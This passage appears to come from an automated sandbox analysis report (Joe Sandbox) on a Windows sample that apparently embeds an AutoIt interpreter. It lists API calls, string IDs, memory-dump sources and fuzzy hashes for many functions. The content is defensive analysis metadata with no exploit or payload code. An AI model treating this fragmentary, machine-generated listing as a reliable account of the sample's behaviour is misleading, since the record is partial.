                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              • Opcode ID: 75492e00ee1c53e0e5146e3ee1fe71281a6244580dc7cb9e244c9d5c65efc30f
                                              • Instruction ID: 0653afebd4caee8befe6c82a60b690ff1ecae0fd086444778eebc74616056b39
                                              • Opcode Fuzzy Hash: 75492e00ee1c53e0e5146e3ee1fe71281a6244580dc7cb9e244c9d5c65efc30f
                                              • Instruction Fuzzy Hash: 23414C7152424A8FCF14FF50D8A6BEE77A4EF21700F6444A6FC651B292EB309D1ACB60
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B8E2A0,00000010,?,Bad directive syntax error,00BDF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00BAF7C2
                                              • LoadStringW.USER32(00000000,?,00B8E2A0,00000010), ref: 00BAF7C9
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • _wprintf.LIBCMT ref: 00BAF7FC
                                              • __swprintf.LIBCMT ref: 00BAF81E
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BAF88D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 1506413516-4153970271
                                              • Opcode ID: 193bf44c593e42e849101b705d8ff09897830d7eb2ba369d56ec6d4bd158c1d4
                                              • Instruction ID: 5ce6fa01ef5fc9aacdbc701e5832bb83bdd579261ec89f428a9663d04c978cc8
                                              • Opcode Fuzzy Hash: 193bf44c593e42e849101b705d8ff09897830d7eb2ba369d56ec6d4bd158c1d4
                                              • Instruction Fuzzy Hash: BA218D3294421AEBCF12EF90CC5AEFE77B8FF18701F0444E6F915660A2EA319618DB50
                                              APIs
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                • Part of subcall function 00B57924: _memmove.LIBCMT ref: 00B579AD
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BB5330
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BB5346
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB5357
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BB5369
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BB537A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              • Opcode ID: 2652c725ad4b64ed1e66cf486c44768767e3f41bd0e0fb8a197247cbcecd0c45
                                              • Instruction ID: 7aadb9e0a380cd0c097c76939a7d498d12ea00950aa355dbd11fc8a5da200257
                                              • Opcode Fuzzy Hash: 2652c725ad4b64ed1e66cf486c44768767e3f41bd0e0fb8a197247cbcecd0c45
                                              • Instruction Fuzzy Hash: 9111C430A901297AD720B765DC4AEFFBBFCEB91B41F0004A9B802A20D1EEA00D08C5B5
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              • Opcode ID: 706e3cf7bacc0657c363aac628bebe1a3d8eba3438b9b05a00d26b84e14c3f52
                                              • Instruction ID: fa115367fe49d0bda050ab425e4883147d5ef79e1b1d9c0bd7354b2e53211930
                                              • Opcode Fuzzy Hash: 706e3cf7bacc0657c363aac628bebe1a3d8eba3438b9b05a00d26b84e14c3f52
                                              • Instruction Fuzzy Hash: 9611A135904115ABCB20AB319C46AFA77F8EB02711F0481F6F45A96192FFB18E81C651
                                              APIs
                                              • timeGetTime.WINMM ref: 00BB4F7A
                                                • Part of subcall function 00B7049F: timeGetTime.WINMM(?,7694B400,00B60E7B), ref: 00B704A3
                                              • Sleep.KERNEL32(0000000A), ref: 00BB4FA6
                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00BB4FCA
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BB4FEC
                                              • SetActiveWindow.USER32 ref: 00BB500B
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BB5019
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BB5038
                                              • Sleep.KERNEL32(000000FA), ref: 00BB5043
                                              • IsWindow.USER32 ref: 00BB504F
                                              • EndDialog.USER32(00000000), ref: 00BB5060
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: a111bc5987ae75a8e56d71c1e5f26328903b812669a82977be51f29a231ea622
                                              • Instruction ID: cb036a3715abc8a16d30c101f69e75f99a370f297fc1303af68f826b578741fb
                                              • Opcode Fuzzy Hash: a111bc5987ae75a8e56d71c1e5f26328903b812669a82977be51f29a231ea622
                                              • Instruction Fuzzy Hash: 0421A47060A606BFE7206F20EC99BBA7BEAFB57745F049065F106831B1DFB18D00C662
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • CoInitialize.OLE32(00000000), ref: 00BBD5EA
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BBD67D
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00BBD691
                                              • CoCreateInstance.COMBASE(00BE2D7C,00000000,00000001,00C08C1C,?), ref: 00BBD6DD
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BBD74C
                                              • CoTaskMemFree.COMBASE(?), ref: 00BBD7A4
                                              • _memset.LIBCMT ref: 00BBD7E1
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00BBD81D
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BBD840
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00BBD847
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00BBD87E
                                              • CoUninitialize.COMBASE ref: 00BBD880
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              • Opcode ID: 7e4e027c7fec56acd8592e3886ac65293fd9edfbc645ec94bd048a8429cdd8c2
                                              • Instruction ID: 91660e0d525a9f5140464eb1dc15583267e9ca1d5f502f3a0e23e90fca5e12a6
                                              • Opcode Fuzzy Hash: 7e4e027c7fec56acd8592e3886ac65293fd9edfbc645ec94bd048a8429cdd8c2
                                              • Instruction Fuzzy Hash: 69B10B75A00109EFDB04DFA4C894EAEBBF9FF49304B1484A9E90ADB261DB74ED45CB50
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00BAC283
                                              • GetWindowRect.USER32(00000000,?), ref: 00BAC295
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00BAC2F3
                                              • GetDlgItem.USER32(?,00000002), ref: 00BAC2FE
                                              • GetWindowRect.USER32(00000000,?), ref: 00BAC310
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00BAC364
                                              • GetDlgItem.USER32(?,000003E9), ref: 00BAC372
                                              • GetWindowRect.USER32(00000000,?), ref: 00BAC383
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00BAC3C6
                                              • GetDlgItem.USER32(?,000003EA), ref: 00BAC3D4
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BAC3F1
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BAC3FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: c49c7284b9fb677a9b5ef7c22569ccde396626488a8fa162fc298584f38ac0a2
                                              • Instruction ID: b0c70ba9592c5390f16ff806ea708c348c804bac766d7e55a22683940cdced0b
                                              • Opcode Fuzzy Hash: c49c7284b9fb677a9b5ef7c22569ccde396626488a8fa162fc298584f38ac0a2
                                              • Instruction Fuzzy Hash: E2513E71B04205ABDF18CFA9DD99AAEBBF6EB88310F14816DF516D7290DB709D00CB10
                                              APIs
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • GetSysColor.USER32(0000000F), ref: 00B521D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: e0ff6c919ffadc0ce241e79c9615dc38dd1ea40d68c09c1124b2d483a5f5ff81
                                              • Instruction ID: da9e0770cee454b2aa1f6ca3cf508f0e0d2c0f77f83b7ee333b67642ebedd1a2
                                              • Opcode Fuzzy Hash: e0ff6c919ffadc0ce241e79c9615dc38dd1ea40d68c09c1124b2d483a5f5ff81
                                              • Instruction Fuzzy Hash: BF41A335006540DEDB215F28EC98BB93BA5EB07322F1442E6FD659B1E1DB328C46DB11
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,00BDF910), ref: 00BBA90B
                                              • GetDriveTypeW.KERNEL32(00000061,00C089A0,00000061), ref: 00BBA9D5
                                              • _wcscpy.LIBCMT ref: 00BBA9FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 15e91e9ec46207c39ddd817e80db763b12729b370c9927048c906aee3ac890aa
                                              • Instruction ID: 1a3ec61e54c088f21d70bcd3b0b33f04df75c22ada0c9956bb5e894337afa009
                                              • Opcode Fuzzy Hash: 15e91e9ec46207c39ddd817e80db763b12729b370c9927048c906aee3ac890aa
                                              • Instruction Fuzzy Hash: 06519A319183019FC710EF14C892ABEB7E5EF94740F5488AEF896572A2DBB19909CA53
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: f75dcdcda3c826bfb5e9838b576a348ac16a80283e29ade676a475b98f86a0e7
                                              • Instruction ID: 041f304e7c98a297dec2dfd0fc52e30dba6d9ad75f7269b44748f8b74e5d7ef2
                                              • Opcode Fuzzy Hash: f75dcdcda3c826bfb5e9838b576a348ac16a80283e29ade676a475b98f86a0e7
                                              • Instruction Fuzzy Hash: CE41D671614206EFDB24EF74D882BBA73E8EF15300F2484FEE959D7291EA319946CB10
                                              APIs
                                              • _memset.LIBCMT ref: 00BD716A
                                              • CreateMenu.USER32 ref: 00BD7185
                                              • SetMenu.USER32(?,00000000), ref: 00BD7194
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD7221
                                              • IsMenu.USER32(?), ref: 00BD7237
                                              • CreatePopupMenu.USER32 ref: 00BD7241
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD726E
                                              • DrawMenuBar.USER32 ref: 00BD7276
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: 3048c031edbcbf26977b481ec1e99559d9560d49fcec0b5bd441136a24b265aa
                                              • Instruction ID: 36f2face16ecb11fc6e2fc637b16d71ba031e5169cc7b50adb4c454659f81302
                                              • Opcode Fuzzy Hash: 3048c031edbcbf26977b481ec1e99559d9560d49fcec0b5bd441136a24b265aa
                                              • Instruction Fuzzy Hash: 27412874A05205EFDB14DF64D884BEABBF5FF4A350F1441AAF905A7351EB31A910CB90
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BD755E
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00BD7565
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BD7578
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BD7580
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BD758B
                                              • DeleteDC.GDI32(00000000), ref: 00BD7594
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BD759E
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BD75B2
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BD75BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: fc46e71acafff161069a16f186bcc81ae5f674a5d0e6fc98b11aa398e4479e3d
                                              • Instruction ID: 776f3085788f1a3168f006a1c579c28191331c068179fd6639a5b8e6d9986b2a
                                              • Opcode Fuzzy Hash: fc46e71acafff161069a16f186bcc81ae5f674a5d0e6fc98b11aa398e4479e3d
                                              • Instruction Fuzzy Hash: 40319231105115BBDF119F64DC19FEBBBA9FF19324F114266FA16922E0EB31D811DB60
                                              APIs
                                              • _memset.LIBCMT ref: 00B76E3E
                                                • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                              • __gmtime64_s.LIBCMT ref: 00B76ED7
                                              • __gmtime64_s.LIBCMT ref: 00B76F0D
                                              • __gmtime64_s.LIBCMT ref: 00B76F2A
                                              • __allrem.LIBCMT ref: 00B76F80
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B76F9C
                                              • __allrem.LIBCMT ref: 00B76FB3
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B76FD1
                                              • __allrem.LIBCMT ref: 00B76FE8
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B77006
                                              • __invoke_watson.LIBCMT ref: 00B77077
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                              • Instruction ID: 971e340617294d8811cb2ad45ae647be3a8a559877337b8f2cc689f7f1b3ab1d
                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                              • Instruction Fuzzy Hash: 3171E876A40B17ABD714AE78DC81B5AB3E4EF04724F14C5B9F528D7291EB70DE408790
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2542
                                              • GetMenuItemInfoW.USER32(00C15890,000000FF,00000000,00000030), ref: 00BB25A3
